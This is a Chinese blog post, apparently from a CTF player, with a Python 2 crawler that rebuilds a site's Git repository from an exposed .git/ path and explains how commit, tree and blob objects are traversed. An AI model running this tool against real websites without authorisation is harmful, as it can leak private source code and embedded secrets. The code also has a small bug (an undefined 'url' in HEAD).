Step-by-step with your own requirement
因為之前為了打 CTF 而寫的一個簡單的 .git 爬蟲:當網站開放使用 .git/ 路徑的時候,可以根據一定的規律將整個 repository 抓下來。
#! /usr/bin/env python
# Copyright (c) 2015-2015 cmj<cmj@cmj.tw>. All right reserved.
class Git(object):
''' Simple crawler for .git REPO '''
def __init__(cls, url, storage='cmj/.git'):
''' initial the project and ensure the host can read .git repo '''
import os
cls._url_ = url
cls.storage = storage
path = storage.split('/')
for _ in range(1, len(path)):
_p = '{0}'.format('/'.join(path[:_]))
if not os.path.isdir(_p):
os.mkdir(_p)
cls.HEAD()
cls.ORIG_HEAD()
cls.FETCH_HEAD()
cls.config()
cls.remote()
def __call__(cls, seed):
''' Download the URL with particular seed '''
import urllib2
try:
req = urllib2.urlopen('{0}/.git/{1}'.format(cls._url_, seed))
except urllib2.HTTPError as e:
return None
else:
return req.read()
def __setitem__(cls, path, value):
''' Restore the file into local repo '''
import os
if not value:
return
path = path.split('/')
for _ in range(len(path)):
_p = '{0}/{1}'.format(cls.storage, '/'.join(path[:_]))
if not os.path.isdir(_p):
os.mkdir(_p)
_p = '{0}/{1}'.format(cls.storage, '/'.join(path))
with open(_p, 'wb') as fd:
fd.write(value)
def commit(cls, seed):
''' Get the commit and store into local, recursively if possible '''
import zlib, struct, os
seed = seed.strip()
seed = 'objects/{0}/{1}'.format(seed[:2], seed[2:])
if os.path.isfile(seed):
return
data = cls(seed)
if not data:
return
cls[seed] = data
## Find the next commit
data = zlib.decompress(data)
fmt, size = data[:data.index(' ')], data[data.index(' '):data.index('\x00')]
off = len(fmt) + 1 + len(size)
data = data[off:off+int(size)]
if 'commit' == fmt:
seed = [_.split()[1] for _ in data.split('\n')[:2]]
map(cls.commit, seed)
elif 'tree' == fmt:
seed = []
while data:
pos = data.index('\x00')+1
fmt = '>IIIII'
seed += [''.join(['%08x' %_ for _ in struct.unpack(fmt, data[pos: pos+20])])]
data = data[pos+20:]
map(cls.commit, seed)
elif 'blob' == fmt:
pass
else:
raise NotImplementedError(fmt)
def HEAD(cls):
''' Load .git/HEAD and related commits '''
if not cls('HEAD'):
raise SystemError('Size {0} is not support .git'.format(url))
print 'Load .git/HEAD ...'
data = cls('HEAD')
cls['HEAD'] = data
refs = data.split()[-1]
seed = cls(refs)
cls[refs] = seed
cls.commit(seed)
def ORIG_HEAD(cls):
''' Load .git/ORIG_HEAD and related commits '''
print 'Load .git/ORIG_HEAD ...'
data = cls('ORIG_HEAD')
cls['ORIG_HEAD'] = data
cls.commit(data)
def FETCH_HEAD(cls):
''' Load .git/FETCH_HEAD and related commits '''
print 'Load .git/FETCH_HEAD ...'
data = cls('FETCH_HEAD')
cls['FETCH_HEAD'] = data
seed = [_.split()[0] for _ in data.split('\n') if _]
map(cls.commit, seed)
def config(cls):
''' Load .git/config '''
print 'Load .git/config ...'
cls['config'] = cls('config')
cls['index'] = cls('index')
def remote(cls):
''' Load .git/refs/remote/origin/HEAD and related commits '''
print 'Load .git/refs/remotes/origin/HEAD ...'
data = cls('refs/remotes/origin/HEAD')
cls['refs/remotes/origin/HEAD'] = data
seed = data.split()[1]
data = cls(seed)
cls[seed] = data
cls.commit(seed)
這個爬蟲的原理是:利用 .git/ 中一定存在的幾個檔案,來判斷有哪些 commit。像是可以從 .git/HEAD 當中可以了解目前 focus 在哪一個 branch (e.g. refs/heads/master),接下來就可以順著這個 commit tree 來撈取相關的 commits。
需要了解的,每一筆 commit 都可能包含了:commit / tree / blob 三種型態。第一種代表著這筆 commit 會跟哪些 commit 有關係, 而 tree 則表示這筆 commit 可能包含著其他的節點,這裡的節點可能包含著 tree 或者是 blob,而 blob 則表示真實儲存的資料點。